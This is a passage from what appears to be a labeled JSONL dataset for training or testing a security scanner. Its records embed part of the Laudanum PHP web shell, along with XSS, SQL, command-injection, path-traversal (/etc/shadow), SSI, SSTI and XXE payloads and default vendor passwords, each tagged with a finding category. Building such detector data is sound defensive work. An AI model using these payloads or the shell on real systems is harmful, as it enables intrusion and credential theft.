contenteditable>test</q>", "injection_type": "XSS"}}]} {"id": "seclists_01559", "source": "seclists", "source_license": "MIT", "text": "<?php\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file provides access to DNS on the system.\n*** Written by Tim Medin <tim@counterhack.com>\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n***\n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n***\n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\ninclude 'ipcheck.php';\n\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP DNS Access</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <p><b>' . $errstr . '</b></p>\n <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>\n\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>');\n }\n}\n\nset_error_handler('error_handler');\n\n\n/* Initialize some variables we need again and again. */\n$query = isset($_POST['query']) ? $_POST['query'] : '';\n$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';\n?>\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP DNS Access</title>\n <link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n\n <script type=\"text/javascript\">\n function init() {\n document.dns.query.focus();\n }\n </script>\n</head>\n<body onload=\"init()\">\n\n<h1>DNS Query 0.1</h1>\n<form name=\"dns\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST\">\n<fieldset>\n <legend>DNS Lookup:</legend>\n <p>Query:<input name=\"query\" type=\"text\">\n Type:<select name=\"type\">\n<?php\n $types = array(\"A\" => DNS_A, \"CNAME\" => DNS_CNAME, \"HINFO\" => DNS_HINFO, \"MX\" => DNS_MX, \"NS\" => DNS_NS, \"PTR\" => DNS_PTR, \"SOA\" => DNS_SOA, \"TXT\" => DNS_TXT, \"AAAA\" => DNS_AAAA, \"SRV\" => DNS_SRV, \"NAPTR\" => DNS_NAPTR, \"A6\" => DNS_A6, \"ALL\" => DNS_ALL, \"ANY\" => DNS_ANY);\n\n if (!in_array($type, array_keys($types))) {\n $type = \"ANY\";\n }\n\n $validtype = 0;\n foreach (array_keys($types) as $t) {\n echo \" <option value=\\\"$t\\\"\" . (($type == $t) ? \" SELECTED\" : \"\") . \">$t</opt", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "dns.php"}}]} {"id": "seclists_01560", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Netgear,<BLANK>,private,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Netgear,<BLANK>,private,"}}]} {"id": "seclists_01561", "source": "seclists", "source_license": "MIT", "text": "filename=' UNION ALL SELECT", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' UNION ALL SELECT", "injection_type": "cmd"}}]} {"id": "seclists_01562", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Style-breaker using obfuscated JavaScript HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Style-breaker using obfuscated JavaScript", "injection_type": "XSS"}}]} {"id": "seclists_01563", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%2A HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2A", "injection_type": "cmd"}}]} {"id": "seclists_01564", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><dt onmouseenter=\"alert(1)\">test</dt></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dt onmouseenter=\"alert(1)\">test</dt>", "injection_type": "XSS"}}]} {"id": "seclists_01565", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<script onmouseenter=\"alert(1)\">test</script> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<script onmouseenter=\"alert(1)\">test</script>", "injection_type": "XSS"}}]} {"id": "seclists_01566", "source": "seclists", "source_license": "MIT", "text": "password: kathy\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "kathy"}}]} {"id": "seclists_01567", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><code onpaste=\"alert(1)\" contenteditable>test</code></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<code onpaste=\"alert(1)\" contenteditable>test</code>", "injection_type": "XSS"}}]} {"id": "seclists_01568", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, URL breaking, basic\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, URL breaking, basic", "injection_type": "XSS"}}]} {"id": "seclists_01569", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<summary onpaste=\"alert(1)\" contenteditable>test</summary>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<summary onpaste=\"alert(1)\" contenteditable>test</summary>", "injection_type": "XSS"}}]} {"id": "seclists_01570", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: Evade Regex Filter 2</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Evade Regex Filter 2", "injection_type": "XSS"}}]} {"id": "seclists_01571", "source": "seclists", "source_license": "MIT", "text": "filename=%2522%7C%20%5B%206%20-ne%20%24%28echo%20BWWRBC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%7C%20%5B%206%20-ne%20%24%28echo%20BWWRBC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01572", "source": "seclists", "source_license": "MIT", "text": "filename=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow", "injection_type": "cmd"}}]} {"id": "seclists_01573", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><meter onmouseleave=\"alert(1)\">test</meter></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<meter onmouseleave=\"alert(1)\">test</meter>", "injection_type": "XSS"}}]} {"id": "seclists_01574", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26%26echo$IFSMUFURB$((94%2B1))$(echo$IFSMUFURB)MUFURB\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%26echo$IFSMUFURB$((94%2B1))$(echo$IFSMUFURB)MUFURB\\", "injection_type": "cmd"}}]} {"id": "seclists_01575", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: IMG w/JavaScript Directive</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: IMG w/JavaScript Directive", "injection_type": "XSS"}}]} {"id": "seclists_01576", "source": "seclists", "source_license": "MIT", "text": "username=1 or benchmark(10000000,MD5(1))#&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1 or benchmark(10000000,MD5(1))#", "injection_type": "SQL"}}]} {"id": "seclists_01577", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_host\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_host\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01578", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=);}print(`echo%20KAJDYV%0aecho%20$((71%2B88))%0aecho%20KAJDYV%0aecho%20KAJDYV`)%3BKAJDYV HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ");}print(`echo%20KAJDYV%0aecho%20$((71%2B88))%0aecho%20KAJDYV%0aecho%20KAJDYV`)%3BKAJDYV", "injection_type": "cmd"}}]} {"id": "seclists_01579", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello constant('Twig_Environment::VERSION')</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "constant('Twig_Environment::VERSION')", "injection_type": "SSTI"}}]} {"id": "seclists_01580", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%27;echo$IFSWZVYQZ$((68%2B9))$(echo$IFSWZVYQZ)WZVYQZ%7C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27;echo$IFSWZVYQZ$((68%2B9))$(echo$IFSWZVYQZ)WZVYQZ%7C", "injection_type": "cmd"}}]} {"id": "seclists_01581", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host==' HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "='", "injection_type": "cmd"}}]} {"id": "seclists_01582", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><meta oncontextmenu=\"alert(1)\">test</meta></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<meta oncontextmenu=\"alert(1)\">test</meta>", "injection_type": "XSS"}}]} {"id": "seclists_01583", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=/ HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/", "injection_type": "LDAP"}}]} {"id": "seclists_01584", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=@var select @var as var into temp end -- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "@var select @var as var into temp end --", "injection_type": "SQL"}}]} {"id": "seclists_01585", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<head id=x tabindex=1 onfocusin=alert(1)></head> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<head id=x tabindex=1 onfocusin=alert(1)></head>", "injection_type": "XSS"}}]} {"id": "seclists_01586", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27;echo$IFSXUIGJZ$((84%2B80))$(echo$IFSXUIGJZ)XUIGJZ%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27;echo$IFSXUIGJZ$((84%2B80))$(echo$IFSXUIGJZ)XUIGJZ%22", "injection_type": "cmd"}}]} {"id": "seclists_01587", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or 1 --' HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1 --'", "injection_type": "SQL"}}]} {"id": "seclists_01588", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Elsa,<N/A>,cisco,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Elsa,<N/A>,cisco,"}}]} {"id": "seclists_01589", "source": "seclists", "source_license": "MIT", "text": "username=or isNULL(1/0) /*&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or isNULL(1/0) /*", "injection_type": "SQL"}}]} {"id": "seclists_01590", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>\"><script src=data:&comma;alert(1)//</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"><script src=data:&comma;alert(1)//", "injection_type": "XSS"}}]} {"id": "seclists_01591", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<video oncanplay=alert(1)><source src=\"validvideo.mp4\" type=\"video/mp4\"></video>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<video oncanplay=alert(1)><source src=\"validvideo.mp4\" type=\"video/mp4\"></video>", "injection_type": "XSS"}}]} {"id": "seclists_01592", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=ASMAX,admin,epicrouter,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "ASMAX,admin,epicrouter,"}}]} {"id": "seclists_01593", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Wyse,root,<BLANK>,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Wyse,root,<BLANK>,"}}]} {"id": "seclists_01594", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0A%20str%3D%24%28echo%20BRBPJX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20BRBPJX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_01595", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=' or 1=1-- HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 1=1--", "injection_type": "cmd"}}]} {"id": "seclists_01596", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello {{{42*42}}}</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "{{{42*42}}}", "injection_type": "SSTI"}}]} {"id": "seclists_01597", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=berkeley\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "berkeley"}}]} {"id": "seclists_01598", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><article onkeyup=\"alert(1)\" contenteditable>test</article></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<article onkeyup=\"alert(1)\" contenteditable>test</article>", "injection_type": "XSS"}}]} {"id": "seclists_01599", "source": "seclists", "source_license": "MIT", "text": "username=; exec ('sel' + 'ect us' + 'er')&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "; exec ('sel' + 'ect us' + 'er')", "injection_type": "SQL"}}]} {"id": "seclists_01600", "source": "seclists", "source_license": "MIT", "text": "filename=\"' or 1 --'\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"' or 1 --'\"", "injection_type": "cmd"}}]} {"id": "seclists_01601", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<%78 onxxx=1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<%78 onxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_01602", "source": "seclists", "source_license": "MIT", "text": "password: doobie\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "doobie"}}]} {"id": "seclists_01603", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=scooby1\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "scooby1"}}]} {"id": "seclists_01604", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %08x", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%08x", "injection_type": "cmd"}}]} {"id": "seclists_01605", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<tr onmouseup=\"alert(1)\">test</tr>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<tr onmouseup=\"alert(1)\">test</tr>", "injection_type": "XSS"}}]} {"id": "seclists_01606", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"unique_id\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"unique_id\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01607", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE xxe [<!ENTITY foo \"aaaaaa\">]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE xxe [<!ENTITY foo \"aaaaaa\">]>", "injection_type": "XXE"}}]} {"id": "seclists_01608", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<iframe id=x tabindex=1 onactivate=alert(1)></iframe>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<iframe id=x tabindex=1 onactivate=alert(1)></iframe>", "injection_type": "XSS"}}]} {"id": "seclists_01609", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x onmouseup=alert(1)>click this!\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x onmouseup=alert(1)>click this!", "injection_type": "XSS"}}]} {"id": "seclists_01610", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=vanilla\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "vanilla"}}]} {"id": "seclists_01611", "source": "seclists", "source_license": "MIT", "text": "username=admin') or ('1'='1'#&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin') or ('1'='1'#", "injection_type": "SQL"}}]} {"id": "seclists_01612", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//", "injection_type": "cmd"}}]} {"id": "seclists_01613", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#x3C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x3C", "injection_type": "cmd"}}]} {"id": "seclists_01614", "source": "seclists", "source_license": "MIT", "text": "password: pebble\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pebble"}}]} {"id": "seclists_01615", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=SAP,Administrator,manage,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "SAP,Administrator,manage,"}}]} {"id": "seclists_01616", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20IVBAZQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_01617", "source": "seclists", "source_license": "MIT", "text": "password: 1012\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "1012"}}]} {"id": "seclists_01618", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_accept_encoding\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_accept_encoding\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01619", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = 0x77616974666F722064656C61792027303A303A313027 ...", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "0x77616974666F722064656C61792027303A303A313027 ...", "injection_type": "SQL"}}]} {"id": "seclists_01620", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%20echo%20NYGDLL$((82%2B79))$(echo%20NYGDLL)NYGDLL%7C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20echo%20NYGDLL$((82%2B79))$(echo%20NYGDLL)NYGDLL%7C", "injection_type": "cmd"}}]} {"id": "seclists_01621", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_01622", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=yahoo\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "yahoo"}}]} {"id": "seclists_01623", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>@keyframes x{}</style><form style=\"animation-name:x\" onanimationstart=\"alert(1)\"></form> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><form style=\"animation-name:x\" onanimationstart=\"alert(1)\"></form>", "injection_type": "XSS"}}]} {"id": "seclists_01624", "source": "seclists", "source_license": "MIT", "text": "filename=\";echo$IFSZRNVWQ$((61%2B2))$(echo$IFSZRNVWQ)ZRNVWQ%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\";echo$IFSZRNVWQ$((61%2B2))$(echo$IFSZRNVWQ)ZRNVWQ%22", "injection_type": "cmd"}}]} {"id": "seclists_01625", "source": "seclists", "source_license": "MIT", "text": "filename=[']", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "[']", "injection_type": "cmd"}}]} {"id": "seclists_01626", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Edimax,edimax,software01,for most Edimax HW????@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Edimax,edimax,software01,for most Edimax HW????"}}]} {"id": "seclists_01627", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_01628", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;", "injection_type": "cmd"}}]} {"id": "seclists_01629", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Netscreen,netscreen,netscreen,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Netscreen,netscreen,netscreen,"}}]} {"id": "seclists_01630", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0A%20str%3D%24%28echo%20IEZSHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": 